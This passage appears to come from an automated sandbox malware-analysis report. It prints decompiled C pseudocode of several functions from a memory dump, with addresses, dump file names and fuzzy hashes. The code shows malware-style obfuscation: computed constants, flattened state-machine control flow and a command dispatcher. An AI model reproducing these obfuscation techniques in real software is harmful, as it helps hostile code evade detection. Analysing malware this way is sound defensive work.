				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002296CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002296CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00218736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00225d24
0x00225d29
0x00225d2a
0x00225d2d
0x00225d30
0x00225d33
0x00225d36
0x00225d3a
0x00225d3b
0x00225d40
0x00225d47
0x00225d49
0x00225d4c
0x00225d4f
0x00225d58
0x00225d5f
0x00225d64
0x00225d6b
0x00225d72
0x00225d79
0x00225d80
0x00225d87
0x00225d8b
0x00225d92
0x00225d9f
0x00225da2
0x00225da5
0x00225dac
0x00225db3
0x00225dba
0x00225dc1
0x00225dcc
0x00225dcf
0x00225dd6
0x00225ddd
0x00225de8
0x00225deb
0x00225df2
0x00225df9
0x00225dfd
0x00225e04
0x00225e0b
0x00225e19
0x00225e1f
0x00225e22
0x00225e25
0x00225e2c
0x00225e33
0x00225e37
0x00225e3e
0x00225e45
0x00225e4c
0x00225e53
0x00225e5a
0x00225e61
0x00225e68
0x00225e6f
0x00225e73
0x00225e77
0x00225e7e
0x00225e85
0x00225e89
0x00225e90
0x00225e97
0x00225e9e
0x00225ea5
0x00225eac
0x00225eb3
0x00225eba
0x00225ec2
0x00225ec5
0x00225ec8
0x00225ecf
0x00225ed6
0x00225edd
0x00225ee8
0x00225eeb
0x00225eef
0x00225ef6
0x00225efd
0x00225f04
0x00225f0b
0x00225f12
0x00225f19
0x00225f20
0x00225f27
0x00225f2e
0x00225f35
0x00225f3c
0x00225f3c
0x00225f4a
0x00225f92
0x00225f94
0x00225f99
0x0022600b
0x00226013
0x00226013
0x00225f9b
0x00000000
0x00225f9b
0x00225f52
0x00225ffd
0x00226007
0x00226009
0x00226009
0x00000000
0x00226007
0x00225f5e
0x00000000
0x00000000
0x00225f60
0x00225f60
0x00225fab
0x00225fac
0x00225fb4
0x00225fba
0x00225fc6
0x00000000
0x00225fc6
0x00225fbc
0x00000000
0x00225fcb
0x00225fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 841c10d7a379342b9488b1df5873a3b755f19433f23cfd393e103dfba1b10651
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: 4B914772C1021AABDF15CFE5D9895EEBFB1FF04314F208109E611762A0D3B94A65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00220F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00220F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00227AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00227AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00218736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00220f15
0x00220f18
0x00220f1a
0x00220f1c
0x00220f1f
0x00220f22
0x00220f24
0x00220f25
0x00220f26
0x00220f2b
0x00220f32
0x00220f35
0x00220f3e
0x00220f45
0x00220f47
0x00220f4e
0x00220f53
0x00220f5a
0x00220f62
0x00220f67
0x00220f6c
0x00220f73
0x00220f7d
0x00220f82
0x00220f8a
0x00220f8f
0x00220f97
0x00220f9c
0x00220fa1
0x00220fa8
0x00220faf
0x00220fb6
0x00220fbd
0x00220fc4
0x00220fc8
0x00220fcf
0x00220fd6
0x00220fdd
0x00220fe4
0x00220feb
0x00220ff2
0x00220ffc
0x00220fff
0x00221002
0x00221009
0x00221010
0x00221017
0x0022101e
0x00221025
0x0022102c
0x00221033
0x0022103a
0x00221041
0x00221045
0x0022104c
0x00221053
0x0022105a
0x0022105d
0x00221064
0x0022106b
0x00221072
0x00221079
0x00221084
0x00221087
0x0022108a
0x00221091
0x00221098
0x0022109f
0x002210a6
0x002210ad
0x002210b4
0x002210b4
0x002210c2
0x002210f5
0x002210fa
0x002210fc
0x00221101
0x00221103
0x00000000
0x00221103
0x002210c4
0x002210ca
0x00221157
0x002210cc
0x002210d2
0x00000000
0x002210d4
0x002210d4
0x00000000
0x002210d4
0x002210d2
0x002210ca
0x00221160
0x00221167
0x00221167
0x00221113
0x00221114
0x0022111d
0x00221123
0x0022112c
0x00000000
0x00221125
0x00221125
0x00000000
0x00221125
0x00000000
0x00221131
0x00221131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: 79664177e72f009517c8325ddcc1e54496164718a6e0cbaeaf23f24e4e7b9279
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: 64617C72D1031AEBDF14CFE5D9859EEBBB2FF58310F248219E512B6290D3B54A618F90

Uniqueness

Uniqueness Score: -1.00%

Function 0021F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0021F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x22ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x22ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x22ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0021F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0022086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0022422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00224F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x0021f444
0x0021f445
0x0021f460
0x0021f451
0x0021f45a
0x0021f45a
0x0021f45d
0x0021f45d
0x0021f464
0x0021f467
0x002298a6
0x002298a9
0x002298b2
0x002298c1
0x002298c3
0x002298c8
0x002298cd
0x002298d2
0x002298d6
0x002298dd
0x002298e8
0x002298e9
0x002298ec
0x002298f3
0x002298fa
0x00229901
0x00229905
0x0022990c
0x00229913
0x0022991c
0x0022991f
0x00229926
0x0022992d
0x00229934
0x00229937
0x0022993b
0x00229942
0x00229949
0x0022994d
0x00229951
0x00229958
0x0022995f
0x00229966
0x0022996a
0x00229971
0x00229978
0x0022997f
0x00229986
0x0022998d
0x00229994
0x0022999b
0x002299a6
0x002299a9
0x002299b0
0x002299b7
0x002299be
0x002299c1
0x002299c8
0x002299cf
0x002299d3
0x002299d7
0x002299de
0x00229a46
0x002299ea
0x00229a2e
0x00229a3b
0x00229a3d
0x002299ec
0x002299f9
0x002299fe
0x00229a04
0x00229a51
0x00229a51
0x00229a06
0x00229a0d
0x00229a19
0x00229a27
0x00000000
0x00229a2d
0x00229a04
0x00229a44
0x00229a44
0x00229a50

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766bb181064bcfc7d2aaa1ecd8f5f0a8328dd751ef6b7d1b6dfc6eb6c8ad9744
Instruction ID: cb955e239f161d5ec7a21d579825f485691e4ef0038bac6c35c9f3d484b1063c
Opcode Fuzzy Hash: 766bb181064bcfc7d2aaa1ecd8f5f0a8328dd751ef6b7d1b6dfc6eb6c8ad9744
Instruction Fuzzy Hash: A8516632D00319EBDB18CFE5D94A9DEBBB0FB08314F208159D516762A0C7B46A95CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002271EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002271EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0021602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002250F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0021B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00211280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00216754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00218F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002226F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00214A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002169A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x002271ef
0x002271fa
0x002271ff
0x00227201
0x00227206
0x00227210
0x00227219
0x00227220
0x00227222
0x00227229
0x00227230
0x00227237
0x0022723b
0x00227242
0x00227249
0x00227250
0x00227254
0x0022725e
0x00227260
0x00227263
0x0022726a
0x00227271
0x00227275
0x0022727c
0x0022727f
0x00227286
0x0022728d
0x00227290
0x00227297
0x0022729e
0x002272a2
0x002272a9
0x002272b0
0x002272bb
0x002272be
0x002272c5
0x002272cc
0x002272d3
0x002272da
0x002272ec
0x002272ef
0x002272f6
0x00227306
0x0022730b
0x00227384
0x0022739e
0x00227324
0x00227329
0x0022732c
0x0022732e
0x00227333
0x00227333
0x00227334
0x0022737e
0x00227336
0x00227336
0x00227336
0x00227337
0x00227371
0x00227339
0x00227339
0x00227339
0x0022733a
0x00227364
0x0022733c
0x0022733c
0x0022733c
0x0022733d
0x00227357
0x0022733f
0x0022733f
0x00227342
0x0022734a
0x0022734a
0x00227342
0x0022733d
0x0022733a
0x00227337
0x00227383
0x00227383
0x00227383
0x00000000
0x0022732e
0x002273ab

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: 2038d0f6afe7ae8d52985c6b58afc03e1dc389c8f71a5ea8545dd7d944447fd2
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: EA515871D2421EABDF04CFE0D8858EEBBB5FF44304F108159D412B6290DBB85A59CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00228ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00228ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0021F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00228634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00220126(_v32, _v24);
					}
					_t115 = E00224AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00228ae5
0x00228aee
0x00228af5
0x00228afc
0x00228b03
0x00228b0e
0x00228b10
0x00228b15
0x00228b1a
0x00228b21
0x00228b28
0x00228b2f
0x00228b36
0x00228b3d
0x00228b44
0x00228b4b
0x00228b52
0x00228b59
0x00228b60
0x00228b67
0x00228b6e
0x00228b75
0x00228b7c
0x00228b83
0x00228b8a
0x00228b92
0x00228b95
0x00228b98
0x00228b9f
0x00228ba6
0x00228baa
0x00228bb1
0x00228bb8
0x00228bbc
0x00228bc0
0x00228bc7
0x00228bce
0x00228bdc
0x00228bdf
0x00228be6
0x00228bed
0x00228bf8
0x00228bf9
0x00228c01
0x00228c07
0x00228c0a
0x00228c11
0x00228c22
0x00228c22
0x00228c26
0x00000000
0x00000000
0x00228c1c
0x00228c2a
0x00228c1e
0x00228c1e
0x00228c20
0x00228c21
0x00000000
0x00228c21
0x00228c2d
0x00228c42
0x00228c48
0x00228c66
0x00228c7f
0x00228c80
0x00000000
0x00228c86
0x00228c59
0x00228c5e
0x00228c64
0x00000000
0x00000000
0x00228c8e
0x00228c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 0a334d9a0188ce1dfe7c44c2f6bd272a828823ceb69108ac741aad43e89fd7f5
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: 6D515371C0221AEFDF49CFA0D94A5EEBBB1FB44304F20819AC011B62A0D7B95B55CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002148BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002148BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x22c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00218736(_t105);
				 *0x22ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x22c110;
				 *_t95 = 0x22c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x22c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00211CFA(_v32, _t122) == 0) {
					E0021F536(_v36, _v28, _v24,  *0x22ca38);
					goto L7;
				}
				return 1;
			}

0x002148cb
0x002148cd
0x002148ce
0x002148d1
0x002148d4
0x002148d5
0x002148d6
0x002148db
0x002148e4
0x002148e9
0x002148ec
0x002148f3
0x002148f7
0x002148fb
0x00214902
0x00214909
0x0021490d
0x00214914
0x0021491b
0x00214922
0x0021492e
0x00214933
0x0021493c
0x00214940
0x00214943
0x0021494a
0x00214951
0x00214958
0x0021495c
0x00214963
0x0021496a
0x00214971
0x00214978
0x0021497f
0x00214986
0x0021498d
0x00214994
0x0021499b
0x002149a8
0x002149ab
0x002149b2
0x002149b9
0x002149c2
0x002149c3
0x002149c6
0x002149d6
0x002149db
0x002149e4
0x00214a2c
0x00000000
0x00214a2c
0x002149e6
0x002149e9
0x002149ec
0x002149ee
0x002149f7
0x002149f3
0x002149f4
0x002149f4
0x00214a0f
0x00214a25
0x00000000
0x00214a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbde6c1f4a91e0aa6d6b5ec9ec1ab68aa81c6902c9410397b62e471d42fdd5e
Instruction ID: 5ee9a1e8bfd07a110087146bcaeaf37641916f2dd1bb2e97d7a386488a4d862c
Opcode Fuzzy Hash: 5bbde6c1f4a91e0aa6d6b5ec9ec1ab68aa81c6902c9410397b62e471d42fdd5e
Instruction Fuzzy Hash: 304146B2D1020AAFDB48CFA5D98A4EEBBB5FF44314F20805AD505BA290D7B84A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002267E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002267E9() {
